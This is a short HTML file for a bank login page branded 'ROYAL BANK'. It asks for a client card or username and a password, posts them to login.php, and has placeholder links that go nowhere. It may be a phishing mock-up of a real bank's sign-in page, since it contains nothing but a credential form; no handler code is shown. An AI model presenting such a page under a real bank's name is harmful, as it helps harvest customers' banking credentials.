<!DOCTYPE html>
<html>
<head>
	<title>ROYAL BANK</title>
    <link rel="shortcut icon" type="image/png" href="favicon.png">
	<style>
		body {
			background-image: url('royal.jpg');
			background-size: cover;
			background-position: center;
			font-family: Garamond, serif;
            height: 100vh;
            display: flex;
            flex-direction: column;
            justify-content: flex-end;
            align-items: center;
		}
		form {
			background-color: #fff;
			padding: 20px;
			border-radius: 5px;
			box-shadow: 0px 0px 10px rgba(0, 0, 0, 0.1);
			max-width: 500px;
			margin: auto;
            
		}
		input[type=text], input[type=email], input[type=password] {
			padding: 10px;
			margin: 10px 0;
			border: none;
			border-radius: 5px;
			width: 100%;
		}
		input[type=submit] {
			background-color: #164e98;
			color: #fff;
			padding: 10px 20px;
			border: none;
			border-radius: 5px;
			cursor: pointer;
			width: 100%;
		}
		input[type=submit]:hover {
			background-color: #114490;
		}
        footer {
			padding: 120px;
			text-align: center;
		}
	</style>
</head>
<body>
	<form action="login.php" method="post">
		<label for="name">Client Card or Username:</label>
		<input type="text" id="name" name="name" placeholder="" required>
		<label for="password">Password:</label>
		<input type="password" id="password" name="password" placeholder="" required>
		<input type="submit" value="Login">
        <br>
        <br>
        <a style="color: rgb(27, 81, 175);">Recover Your Username</a>
        <br>
        <br>
        <a style="color: rgb(27, 81, 175);">Enroll in Online Banking</a>


	</form>
    <footer>
		<p>© 1995 - 2023</p>
	</footer>
</body>
</html>
